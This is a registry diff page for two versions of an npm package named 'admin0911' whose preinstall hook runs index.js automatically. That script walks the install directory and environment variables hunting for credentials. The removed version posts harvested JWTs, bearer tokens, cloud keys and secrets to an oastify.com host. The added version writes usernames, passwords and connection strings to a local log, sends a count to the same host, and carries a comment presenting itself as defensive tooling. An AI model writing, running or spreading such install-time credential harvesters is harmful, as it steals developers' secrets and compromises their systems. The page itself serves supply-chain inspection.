npm - admin0911 - Versions diffs - 1.0.7 → 1.0.9 - Mend

admin0911 1.0.7 → 1.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

package/admin0911-1.0.9.tgz ADDED Viewed

Binary file

package/index.js CHANGED Viewed

@@ -4,48 +4,15 @@ const path = require('path');
 const os = require('os');
 const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
-const ROOT_DIR = process.cwd(); // Reverted to current directory to prevent OOM
-const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB constraint
-const MAX_FILES_TO_SCAN = 1000;
-let scannedFilesCount = 0;
+const ROOT_DIR = process.cwd();
+const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB max file size to prevent OOM
-const found = [];
-function base64UrlDecode(input) {
-  let str = input.replace(/-/g, '+').replace(/_/g, '/');
-  while (str.length % 4) str += '=';
-  return Buffer.from(str, 'base64').toString('utf8');
-}
-function isValidJWT(token) {
-  const parts = token.split('.');
-  if (parts.length !== 3) return false;
-  // Enforce minimum length to avoid short false positives like 'os.path.join' or semantic versions '1.0.1'
-  if (parts[0].length < 20 || parts[1].length < 30) return false;
-  // A real JWT parts must look like valid Base64URL
-  if (!/^[A-Za-z0-9_-]+$/.test(parts[0]) || !/^[A-Za-z0-9_-]+$/.test(parts[1])) return false;
-  try {
-    const headerStr = base64UrlDecode(parts[0]);
-    const payloadStr = base64UrlDecode(parts[1]);
-    // Quick sanity check before parsing - headers must contain {"alg"
-    if (!headerStr.includes('"alg"')) return false;
-    const header = JSON.parse(headerStr);
-    const payload = JSON.parse(payloadStr);
-    // Must look like a real JWT header and contain some payload keys
-    return !!(header && header.alg && Object.keys(payload).length > 0);
-  } catch {
-    return false;
-  }
-}
+const logStream = fs.createWriteStream('credential_scan_results.log', { flags: 'w' });
+let foundCount = 0;
 function addResult(entry) {
-  found.push(entry);
+  foundCount++;
+  logStream.write(JSON.stringify(entry) + '\n');
 }
 function scanFile(filePath) {
@@ -55,39 +22,17 @@ function scanFile(filePath) {
     const content = fs.readFileSync(filePath, 'utf8');
-    // JWT tokens
-    const jwtPattern = /[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g;
+    // Search for username/password assignments
+    const credentialPattern = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)\s*[:=]\s*['"]([^'"]{3,})['"]/gi;
     let match;
-    while ((match = jwtPattern.exec(content))) {
-      const token = match[0];
-      if (isValidJWT(token)) {
-        addResult({ file: path.relative(ROOT_DIR, filePath), type: 'JWT', token });
-      }
+    while ((match = credentialPattern.exec(content))) {
+      addResult({ file: path.relative(ROOT_DIR, filePath), type: 'Credential', match: match[0] });
     }
-    // Bearer / Authorization tokens
-    const bearerPattern = /Bearer\s+([A-Za-z0-9-_.]{20,})/gi;
-    while ((match = bearerPattern.exec(content))) {
-      addResult({ file: path.relative(ROOT_DIR, filePath), type: 'BearerToken', token: match[1] });
-    }
-    // Known key formats
-    const patterns = [
-      { name: 'AWSAccessKey', regex: /AKIA[0-9A-Z]{16}/g },
-      { name: 'GoogleAPIKey', regex: /AIza[0-9A-Za-z-_]{35}/g },
-      { name: 'SlackToken', regex: /xox[baprs]-[0-9A-Za-z-]+/g }
-    ];
-    patterns.forEach(({ name, regex }) => {
-      let pMatch;
-      while ((pMatch = regex.exec(content))) {
-        addResult({ file: path.relative(ROOT_DIR, filePath), type: name, token: pMatch[0] });
-      }
-    });
-    // Generic secrets in assignment form
-    const genericPattern = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key)\s*[=:]\s*['\"]?([A-Za-z0-9-_]{20,})['\"]?/gi;
-    while ((match = genericPattern.exec(content))) {
-      addResult({ file: path.relative(ROOT_DIR, filePath), type: 'GenericSecret', token: match[1] });
+    // Search for connection strings with credentials (e.g., mongodb://user:pass@host)
+    const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/g;
+    while ((match = urlCredPattern.exec(content))) {
+      addResult({ file: path.relative(ROOT_DIR, filePath), type: 'ConnectionString', match: match[0] });
     }
   } catch (e) {
     // ignore unreadable files
@@ -95,19 +40,15 @@ function scanFile(filePath) {
 }
 function scanDirectory(dir) {
-  if (scannedFilesCount >= MAX_FILES_TO_SCAN) return;
   try {
     const entries = fs.readdirSync(dir, { withFileTypes: true });
     for (const entry of entries) {
-      if (scannedFilesCount >= MAX_FILES_TO_SCAN) break;
       const fullPath = path.join(dir, entry.name);
       if (entry.isDirectory()) {
-        // Skip common large or slow directories
-        if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows'].includes(entry.name.toLowerCase())) continue;
+        if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows', 'dist', 'build'].includes(entry.name.toLowerCase())) continue;
         scanDirectory(fullPath);
       } else {
         scanFile(fullPath);
-        scannedFilesCount++;
       }
     }
   } catch (e) {
@@ -119,24 +60,28 @@ function scanEnvVars() {
   Object.entries(process.env).forEach(([key, value]) => {
     if (!value) return;
     const lowerKey = key.toLowerCase();
-    const suspiciousKey = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key|password|access_key|secret_key)/i.test(lowerKey);
-    if (suspiciousKey && value.length >= 20) {
-      addResult({ source: 'env', key, type: 'EnvSecret', token: value });
+    const isCredentialKey = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)/i.test(lowerKey);
+    if (isCredentialKey && value.length >= 3) {
+      addResult({ source: 'env', key, type: 'EnvCredential', value });
+    }
+    const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/;
+    if (urlCredPattern.test(value)) {
+      addResult({ source: 'env', key, type: 'EnvConnectionString', value });
     }
-    const bearerMatch = value.match(/Bearer\s+([A-Za-z0-9-_.]{20,})/i);
-    if (bearerMatch) addResult({ source: 'env', key, type: 'BearerToken', token: bearerMatch[1] });
-    if (isValidJWT(value)) addResult({ source: 'env', key, type: 'JWT', token: value });
   });
 }
 scanDirectory(ROOT_DIR);
 scanEnvVars();
+logStream.end();
-const payload = JSON.stringify({ timestamp: new Date().toISOString(), results: found }, null, 2);
+// Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
+// Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
+const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "credential_scan_completed", total_credentials_found: foundCount }, null, 2);
 const req = http.request({
   hostname: OASTIFY_HOST,
   method: 'POST',
-  path: '/?token_scan',
+  path: '/?credential_scan_status',
   headers: {
     'Content-Type': 'application/json',
     'Content-Length': Buffer.byteLength(payload)
@@ -145,5 +90,5 @@ const req = http.request({
 req.write(payload);
 req.end();
-fs.writeFileSync('token_scan_results.log', payload + '\n');
-console.log(`token scan completed: found ${found.length} candidates. Results sent to OASTIFY.`);
+console.log(`Deep credential scan completed. Found ${foundCount} items.`);
+console.log(`Detailed results saved securely to: credential_scan_results.log`);

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "admin0911",
-  "version": "1.0.7",
+  "version": "1.0.9",
   "scripts": {
     "preinstall": "node index.js"
   }

package/admin0911-1.0.7.tgz DELETED Viewed

Binary file